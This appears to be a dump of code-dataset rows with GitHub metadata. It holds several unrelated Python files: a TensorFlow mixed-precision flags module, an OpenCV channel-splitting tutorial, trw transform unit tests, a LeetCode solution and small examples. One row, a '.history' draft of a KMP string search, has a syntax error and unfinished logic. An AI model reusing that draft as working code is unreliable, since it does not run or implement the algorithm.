cwd=bld.path.find_dir('inc/cogs'),
install_path=bld.env.PREFIX + '/lib',
relative_trick=True)
from waflib.Tools import waf_unit_test
bld.add_post_fun(waf_unit_test.summary)
bld.recurse("demo")
|
[
"[email protected]"
] | ||
cdc237084299675f5c218544154e89c2be810335
|
980434e03e722eaf3a5ff4ab4f1971c8d1cde4c5
|
/宝石与石头.py
|
a2ae90f7262a28b814a440bfe3b1d2cf7a48bc01
|
[] |
no_license
|
arry-lee/arryleetcode
|
c9c548b0defc9771e4e488b3e760809364456c99
|
b4b9b971ec81a921cca606dfa46ea4109d975dfb
|
refs/heads/master
| 2020-07-26T14:11:27.645307 | 2019-09-15T23:31:09 | 2019-09-15T23:31:09 | 208,670,826 | 1 | 0 | null | null | null | null |
WINDOWS-1252
|
Python
| false | false | 172 |
py
|
#±¦Ê¯Óëʯͷ
#2019-08-17 06:20:13
class Solution:
def numJewelsInStones(self, J: str, S: str) -> int:
return len([stone for stone in S if stone in J])
|
[
"[email protected]"
] | |
ced152ee74e1836bdeb08bcfe32e146b988939d7
|
556db265723b0cc30ad2917442ed6dad92fd9044
|
/tensorflow/python/training/experimental/mixed_precision_global_state.py
|
6f0a179db65b1ebb31c2cbc1265eaf71b2a09fd6
|
[
"MIT",
"Apache-2.0",
"BSD-2-Clause"
] |
permissive
|
graphcore/tensorflow
|
c1669b489be0e045b3ec856b311b3139858de196
|
085b20a4b6287eff8c0b792425d52422ab8cbab3
|
refs/heads/r2.6/sdk-release-3.2
| 2023-07-06T06:23:53.857743 | 2023-03-14T13:04:04 | 2023-03-14T13:48:43 | 162,717,602 | 84 | 17 |
Apache-2.0
| 2023-03-25T01:13:37 | 2018-12-21T13:30:38 |
C++
|
UTF-8
|
Python
| false | false | 2,635 |
py
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains global variables related to mixed precision.
This is not part of mixed_precision.py to avoid a circular dependency.
mixed_precision.py depends on Session, and Session depends on this file.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.util.tf_export import tf_export
# Whether the mixed precision graph rewrite has been enabled or not with
# `enable_mixed_precision_graph_rewrite`. Used to turn on auto_mixed_precision
# in ConfigProtos passed to Sessions.
_mixed_precision_graph_rewrite_is_enabled = False
# True if a Session has been created without the mixed precision graph rewrite
# being enabled. Used to give a warning if mixed precision is enabled after a
# Session has already been created.
_non_mixed_precision_session_created = False
# Whether the global tf.keras.mixed_precision.Policy uses mixed precision. Used
# to raise an error message if both a mixed Policy and the graph rewrite are
# used at the same time.
_using_mixed_precision_policy = False
@tf_export('__internal__.train.is_mixed_precision_graph_rewrite_enabled', v1=[])
def is_mixed_precision_graph_rewrite_enabled():
return _mixed_precision_graph_rewrite_is_enabled
def set_mixed_precision_graph_rewrite_enabled(enabled):
global _mixed_precision_graph_rewrite_is_enabled
_mixed_precision_graph_rewrite_is_enabled = enabled
def non_mixed_precision_session_created():
return _non_mixed_precision_session_created
def set_non_mixed_precision_session_created(created):
global _non_mixed_precision_session_created
_non_mixed_precision_session_created = created
def is_using_mixed_precision_policy():
return _using_mixed_precision_policy
@tf_export('__internal__.train.set_using_mixed_precision_policy', v1=[])
def set_using_mixed_precision_policy(is_using):
global _using_mixed_precision_policy
_using_mixed_precision_policy = is_using
|
[
"[email protected]"
] | |
09018e0be0d1189db97fad7103f982719fe99170
|
e25b917f2f0ce28f6d046afaa9c0faddf0aeae34
|
/Tutorials/split_and_merging.py
|
0e4d372a63ff7e204d74bc9d502e062c6df0682b
|
[] |
no_license
|
pmusau17/ComputerVision
|
d9344c22ed1fe1bf8a8c6166a060c307c08529a5
|
2fcdce0a967567c15232fe3c9f02982ca95e5796
|
refs/heads/master
| 2020-12-11T00:30:20.292943 | 2020-06-03T21:54:36 | 2020-06-03T21:54:36 | 233,751,710 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 786 |
py
|
import numpy as np
import argparse
import cv2
#create argument parser
ap=argparse.ArgumentParser()
ap.add_argument('-i','--image', required=True)
args=vars(ap.parse_args())
#load the image
image=cv2.imread(args['image'])
(B,G,R)=cv2.split(image)
#this will display each of the channels as grayscale
cv2.imshow("Red",R)
cv2.imshow("Green",G)
cv2.imshow("Blue",B)
cv2.waitKey(0)
#this is what I want because I want zeros in the other channels and I hope it gets the
#correct predition
zeros = np.zeros(image.shape[:2],dtype='uint8')
cv2.imshow("Red",cv2.merge([zeros,zeros,R]))
cv2.imshow("Green",cv2.merge([zeros,G,zeros]))
cv2.imshow("Blue",cv2.merge([B,zeros,zeros]))
cv2.waitKey(0)
merged=cv2.merge([B,G,R])
cv2.imshow("Merged",merged)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
[
"[email protected]"
] | |
17237a95039c4b7a5d68f70a91b7049b857dfa02
|
52b5773617a1b972a905de4d692540d26ff74926
|
/.history/kmp_20200716201539.py
|
c0ccf11ea7faea0cd681296187ca576428e15267
|
[] |
no_license
|
MaryanneNjeri/pythonModules
|
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
|
f4e56b1e4dda2349267af634a46f6b9df6686020
|
refs/heads/master
| 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 785 |
py
|
'''
Given a text txt[0..n-1] and a pattern pat[0..m-1],
write a function search(char pat[], char txt[]) that prints all occurrences of pat[] in txt[]. You may assume that n > m.
'''
def pattern(txt,pat):
# Catepillar algorithm
# we have a left and right pointer
# then the length of the search string
# when searching for the string when they don't match move the right pointer
# to increase the window size
# if the match return poisition of left, store it in an array
# when the len(sub) > substring move the left pointer
if pat in txt:
left = 0
right = 1
while right < len(txt) and left < len(txt):
if txt[left:right] == pat
print('index',txt.index(pat))
pattern("AABAACAADAABAABA","AABA")
|
[
"[email protected]"
] | |
d6db78cbc8e88ec12c049d25fffbbe429655373c
|
c22b9c7c4a854ed985e777bcbecd18870439b334
|
/byteofpy/file.py
|
b2c51954e6226494b8066a0e68daaff28ff6f548
|
[
"BSD-3-Clause"
] |
permissive
|
pezy/python_test
|
ceb35a8a63ca8ebe26ffa5c72ace664718c7b328
|
b019a0d9f267b5071c37fc85c9acaf27e9146625
|
refs/heads/master
| 2021-01-19T01:09:20.820202 | 2016-07-30T08:35:15 | 2016-07-30T08:35:15 | 18,096,404 | 0 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 415 |
py
|
poem = '''\
Programming is fun
When the work is done
if you wanna make your work also fun:
use Python!
'''
# Open for writing
f = open('poem.txt', 'w')
# Write text to file
f.write(poem)
f.close()
# If no mode is specified
# Read mode is assumed by default
f = open('poem.txt')
while True:
line = f.readline()
# Zero length indicates EOF
if len(line) == 0:
break
print line,
f.close()
|
[
"[email protected]"
] | |
2d5ee23a8cba0fea02e4f205bafc24f5c98fc027
|
375e5bca82843647941068bd7634cf7adf2015ca
|
/tests/test_transforms_resize_modulo_pad_crop.py
|
f72a33b918735569e106f2221c7a10a6e1392d92
|
[
"MIT"
] |
permissive
|
civodlu/trw
|
cd57e7bded7fdb0a9d623ed9cd50645fab96583b
|
11c59dea0072d940b036166be22b392bb9e3b066
|
refs/heads/master
| 2023-02-08T09:56:39.203340 | 2023-02-07T14:22:16 | 2023-02-07T14:22:16 | 195,147,670 | 12 | 2 |
MIT
| 2020-10-19T15:24:11 | 2019-07-04T01:19:31 |
Python
|
UTF-8
|
Python
| false | false | 1,864 |
py
|
import unittest
import trw
import torch
import numpy as np
class TestTransformsResizeModuloPadCrop(unittest.TestCase):
def test_crop_mode_torch(self):
batch = {
'images': torch.rand([2, 3, 64, 64], dtype=torch.float32)
}
tfm = trw.transforms.TransformResizeModuloCropPad(60)
transformed = tfm(batch)
assert transformed['images'].shape == (2, 3, 60, 60)
def test_crop_mode_torch_multiples(self):
# test with multiple of `multiples_of` shape
batch = {
'images': torch.rand([2, 3, 64, 64], dtype=torch.float32)
}
tfm = trw.transforms.TransformResizeModuloCropPad(10)
transformed = tfm(batch)
assert transformed['images'].shape == (2, 3, 60, 60)
def test_crop_mode_torch_different_shape(self):
batch = {
'images': torch.rand([2, 3, 64, 64], dtype=torch.float32),
'images2': torch.rand([2, 1, 64, 64], dtype=torch.float32)
}
batch['images'][0, 0, 32, 32] = 42.0
batch['images2'][0, 0, 32, 32] = 42.0
tfm = trw.transforms.TransformResizeModuloCropPad(60)
transformed = tfm(batch)
# make sure we can handle different shapes of the same dimension
assert transformed['images'].shape == (2, 3, 60, 60)
assert transformed['images2'].shape == (2, 1, 60, 60)
# make sure the crop/pad are the same for the different images
indices = np.where(batch['images'].numpy() == 42)
assert (batch['images2'][indices] == 42.0).all()
def test_pad_mode_torch(self):
batch = {
'images': torch.rand([2, 3, 65, 65], dtype=torch.float32)
}
tfm = trw.transforms.TransformResizeModuloCropPad(32, mode='pad')
transformed = tfm(batch)
assert transformed['images'].shape == (2, 3, 96, 96)
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.